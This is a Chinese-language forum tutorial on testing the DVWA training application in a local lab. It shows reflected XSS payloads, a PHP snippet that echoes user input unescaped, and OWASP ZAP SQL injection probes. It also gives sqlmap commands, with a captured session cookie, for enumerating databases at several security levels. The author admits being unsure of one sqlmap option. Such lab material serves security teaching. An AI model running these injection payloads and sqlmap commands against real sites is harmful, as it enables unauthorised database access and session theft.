来源:http://bbs.ichunqiu.com/thread-9637-1-1.html?from=ch
实验测试
/vulnerabilities/sqli/?id=1bjupnalert(1)dcwjj&Submit=Submit
返回数据包
ID: 1bjupnalert(1)dcwjj
First name: admin
Surname: admin
可以看出提交的javascript语句被执行 写入页面了 判断为反射型xss跨站
我们看一下他的源代码
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Feedback for end user
echo '
Hello ' . $_GET[ 'name' ] . '';
}
?>
它只是简单的用了一个if语句判断有没有输入参数 然后将内容echo出来
XSS跨站脚本漏洞原理:
XSS跨站脚本漏洞的产生是由于Web应用程序对用户的输入过滤不如而产生的,攻击者利用网站漏洞把恶意脚本代码(通常包括HTML代码和Javascript脚本)注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者可能采取Cookie资料窃取,会话劫持,钓鱼欺骗等攻击。
接下来我们上Owasp-zap
上Owasp-zap配置好代理,直接把目标URL丢到 active scan模块里。
怎么折腾这里就不详细说了, 直接来看扫描结果
扫描出来了 一个SQL注入 一个XSS跨站。
首先我们来看看sql注入吧
看看他提交的payload数据包 和返回包 判断漏洞是否为误报。
Owasp测试sql注入的payload
/vulnerabilities/sqli/?id=1%27+UNION+ALL+select+NULL+--+&Submit=Submit
返回数据包
he used SELECT statements have a different number of columns
可以看到他查询数据库内容时报错的信息 初步判断出为sql显注。
下面我们来看看xss跨站脚本
出弹窗了。
Owasp测试XSS跨站的payload
/vulnerabilities/sqli/?id=%27%22%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&Submit=Submit
返回数据包
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"alert(1);'' at line 1
可以看出提交的javascript语句被执行 写入页面了 判断为反射型xss跨站。
3.漏洞利用
DVWA Sql注入漏洞Low级
get 注入
注入点:
http://192.168.0.150/vulnerabilities/sqli/?id=1&Submit=Submit
直接上Sqlmap
Sqlmap语句:
python sqlmap.py -u "http://192.168.0.150/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=955sq1mff2p6tis9hc5cieqvu6; security=low" --dbs
-u 指定目标URL
--cookie 指定cookie
--dbs 枚举DBMS中的数据库
因为DVWA是登陆状态所以要加Burp拦截下的cookie 跑数据库名
跑出来了数据库信息 做白帽的话跑到这里就可以去提交漏洞了 不必再往下深入。
DVWA Sql注入漏洞medium级
post注入
我们直接把burp拦截下的数据包保存到桌面 然后sqlmap语句
python sqlmap.py -r /root/桌面/1 --dbs
-r sqlmap加载我们的post请求1.txt文件
DVWA Sql注入漏洞hight级
post注入
我们直接把burp拦截下的数据包保存到桌面 然后sqlmap语句:
python sqlmap.py -r /root/桌面/2 --second-order="http://192.168.0.150/vulnerabilities/sqli/" --dbs
-r sqlmap加载我们的post请求文件
second-order 啊,这个我也忘了 只是记得是这个参数 有兴趣的小伙伴下去了解了解吧
matesploit渗透我们下期再说吧。
呼呼 可算是写完了,今天的内容就到这里啦 感谢大家的收看。。。
L0ne1y